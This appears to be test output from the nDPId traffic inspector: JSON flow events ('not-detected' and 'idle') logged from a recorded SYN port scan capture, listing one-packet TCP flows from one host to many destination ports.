+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5915,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10012,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5915,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10012,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3871,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3871,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3871,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3871,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5922,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5922,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5922,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5922,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5925,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5925,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5925,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5925,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3880,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
